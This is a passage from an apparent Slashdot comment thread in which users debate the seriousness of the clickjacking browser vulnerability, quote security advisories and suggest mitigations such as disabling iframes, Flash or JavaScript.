    Its default option is pulled from /etc/mailcap and friends (debian, with imagemagick installed: image/gif; display 'gif:%s'; test=test -n "$DISPLAY")

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
  62. Web Dev Guy by Anonymous Coward · · Score: 0

    iFrames are evil!
    All they are used for is Adverts & Hackers.

    I block iFrames in Opera 8)

    How to ban them simple the next update of all Browsers would disable them where they could not be turned back on! This would force the Web Dev Guys like to fix your site ;)

    While I'm at it Google is SpyWare they use iFrames also!

  63. Details here... by t0y · · Score: 1

    Unfortunately, I'm a mere mortal.. :(

    https://bugzilla.mozilla.org/show_bug.cgi?id=457011

  64. Slashdot bought by Fox News? by GoodNicksAreTaken · · Score: 1

    I'd worry about this but I've locked my self in the closet in order to be safe from killer bees and I can't be arsed.

  65. What an extremely bad article by tsa · · Score: 1

    I RTFA, and the only things I learned are that:

    1. It's very bad;

    2. They can 'make me click anywhere on the page'

    3. It's very bad.

    --
    -- Cheers!

  66. Clickjacking by Anonymous Coward · · Score: 0

    Java script and vbscript are easy enough to deal with... Why not uninstall/disable flash... It is a neat technology but rarely used in a productive manner. Before ya start flaming me, do a rough count of all the ads, innocuous videos, poorly designed games and websites, and any other useless/nefarious/wasteful implementation you can think of... Compare that to, say, the number of all helpful, intelligent, productive, and generally useful/fun implementations you can think of. As for me the math is relatively easy.

  67. Iframes? by sk89q · · Score: 1

    So little detail! :( Iframes is what I suspect what it is: http://sk89q.therisenrealm.com/2008/09/clickjacking/

    If you're still pondering.

  68. iframes? by Anonymous Coward · · Score: 0

    iframes? who needs that anyway.

  69. What exactly is the danger? by myxiplx · · Score: 1

    Ok, forgive my ignorance, but what exactly is the problem here? It sounds like they can redirect my click, getting my browser to visit another page. Apart from being a slight nuisance, how is that going to cause a problem?

    Surely it's only going to be an issue if you are also vulnerable to something else that allows the target site to install malicious software on your machine, and people being vulnerable to stuff like that isn't exactly news.

    I mean, if I've already locked down javascript, plugins, active scripting, etc in IE (or just noscript in Firefox), surely the absolute worst this can do is redirect me to a site that try as it might, still can't infect my pc?

    The summary and article sound like the sky is falling, but unless I've misunderstood, I don't even think I need to react to this. Sure, it'll be mildly irritating if I visit an affected site, but I'm already protected from anything worse.

    So far it's getting a "-1 Meh" from me.

  70. Isn't that rather old? by hweimer · · Score: 1

    This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

    So, how is this essentially different from CVE-2004-0762, fixed in Firefox four years ago? Okay, they might have found new attack scenarios, but the technique seems to be rather old.

    --
    OS Reviews: Free and Open Source Software
    1. Re:Isn't that rather old? by Ambush+Commander · · Score: 1

      If you read the CVE advisory carefully, the vulnerability is a faulty access policy for allowing extension installation by web-based JavaScript.

      Yes, the technique is old, in that it's been around since iframes and CSS have been around, but we haven't really seen it in malware websites; most attackers use less sophisticated but still effective methods.

  71. Myspace by andersen_hc · · Score: 1

    People... they are talking about Myspace. Apparently most modern browsers are vulnerable to Myspace.

  72. Re: OffByOne by TaoPhoenix · · Score: 1

    Sorry,

    I checked this and everything looks really ugly.

    Can we get an OffByTwo browser that can sneak past the exploit but not look quite so awful?

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  73. Re: spooky playground was some CSS delusion by TaoPhoenix · · Score: 1

    Ender's Game FTW!

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  74. Re: Might try that... by TaoPhoenix · · Score: 1

    No.

    It causes you to perform actions on the football player's girlfriend you didn't think you were performing!

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  75. Re: Homestarrunner! by TaoPhoenix · · Score: 1

    SB: Clicking on the Icky Sticky Clicky Wiki's...

    SB: "Dear StrongBad. This website says that if I click on a link I could get my browser taken over!! What do I do? P.S. I want the Tire."

    SB: Easy IWTT. Click Here to open a nice juicy SubPrime Mortgage on that tire. https://www.wamu.com/personal/default.asp

    SB: Gotcha! That's Washington Mutual! They got hosed so The Government said, "You have no chance to survive make your time." JP Morgan stepped in and said "All Your Mortgage Are Belong To Us."

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  76. Re: "It's Not Scary"?! by TaoPhoenix · · Score: 1

    Mod Parent Troll.

    You're handed a juicy exploit that gives you nice little clicks and can't think of a way to break it?!

    Here is the Least severe example I can think of. You click to look up something at work and it sends P0rn to HR.

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  77. Re: Give me my cookies! by TaoPhoenix · · Score: 1

    Carnegie Hall "milk and cookies" Show:

    In an April 1979 performance at New York's Carnegie Hall, ...

    The performance is most famous for Kaufman ending the show by actually taking the entire audience, in 20 buses, out for milk and cookies.

    http://en.wikipedia.org/wiki/Andy_Kaufman

    Now... do you trust me to give you an honest link?

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  78. NoScript blocks them by elfguy · · Score: 1

    No need, NoScript blocks most of these attacks, according to a follow up post.

  79. Re: Might try that... by hesiod · · Score: 1

    Actually, you thought it was his girlfriend... but it was actually him.

  80. A NoScript Option Fixes this Vulnerabilty by Ginger+Unicorn · · Score: 1

    in TFA it says NoScript doesn't stop the problem 100% - but there is a link to a page that says that only applies in NoScript's default setup. You can get it to stop this problem completely.

    http://blogs.zdnet.com/security/?p=1973

    noscript -> options -> plugins -> forbid IFRAME.

    should be helpful till someone comes up with a proper solution.

    --
    (1.21 gigawatts) / (88 miles per hour) = 30 757 874 newtons
  81. patch? by An+anonymous+Frank · · Score: 1

    how about something that disables (i)frames?

  82. is this really that big a deal? by semirandom · · Score: 1

    So a malicious website can get you to click on a link or button of another website. Could someone explain to me how this could be used to do anything other than inconvenience the user - "ha ha loser, you thought you were clicking on that free porn button but i just made you click on the Delete All Email button". As for a solution, couldn't users install something like Stylish (https://addons.mozilla.org/en-US/firefox/addon/2108) and add a rule to put a bright red border around all IFRAMEs?

  83. Re: "It's Not Scary"?! by pyrr · · Score: 1

    Actually, more like you click on something at work, you come across an unsavory site, it tries to load pr0n popups on you, the corporate web-nanny blocks them all, you get called into HR to explain the situation. The only thing is, this sort of web-cruft has been around a while. This is just a way to make it happen through real external-site clicks rather than just launching popups. A nuisance, but not a particularly scary exploit. Maybe it just takes a lot to scare me-- I'd be worried if it could perform actions on pages it brought up, but if all it does is make me follow links it wants me to visit, the worst case scenario is that I'm going to close the browser and never go to the site again...

  84. Re: Performing Actions on a site by TaoPhoenix · · Score: 1

    That's just the problem - it can.

    "Follow a link" can go to *anything* including custom loaded pages which then do actions...

    Would bringing an FBI Raid upon your head be scary enough?

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  85. Re:Bullshit? Not b.s. -IFrames & Plugins + JSc by Anonymous Coward · · Score: 0

    Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER):

    http://secunia.com/advisories/32163/

    SALIENT QUOTE:

    "A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. [b]Solution: The vendor recommends disabling Flash Player camera and microphone interactions[/b]"

    ----

    It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

    http://www.securityfocus.com/news/11534/2

    SALIENT QUOTE:

    "JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer,"

    APK

  86. I was correct, per SecurityFocus.com & Secunia by Anonymous Coward · · Score: 0

    Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER), which was the reply I just replied to in THIS followup posting:

    http://secunia.com/advisories/32163/

    SALIENT QUOTE:

    "A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. Solution: The vendor recommends disabling Flash Player camera and microphone interactions"

    ----

    It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

    http://www.securityfocus.com/news/11534/2

    SALIENT QUOTE:

    "JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer,"

    APK

    P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

    HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

    http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

    AND, as you can see? IT JUST WORKS (even vs. the "latest/greatest" security threats/hacks/vulnerabilities: Common-sense usually does work)... apk

  87. I was correct, per SecurityFocus.com & Secunia by Anonymous Coward · · Score: 0

    Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER), which was the reply I just replied to in THIS followup posting:

    http://secunia.com/advisories/32163/

    SALIENT QUOTE:

    "A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. Solution: The vendor recommends disabling Flash Player camera and microphone interactions"

    ----

    It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

    http://www.securityfocus.com/news/11534/2

    SALIENT QUOTE:

    "JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer"

    (A note to the news submitters here & the editors: Learn about this stuff, before stating things that are outright incorrect (such as the init. newspost stating turning off javascript would not help vs. this new threat... without understanding this stuff thoroughly, first? You'll end up eating your words...)

    APK

    P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

    HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

    http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

    AND, as you can see? IT JUST WORKS (even vs. the "latest/greatest" security threats/hacks/vulnerabilities? Common-sense usually does work)... apk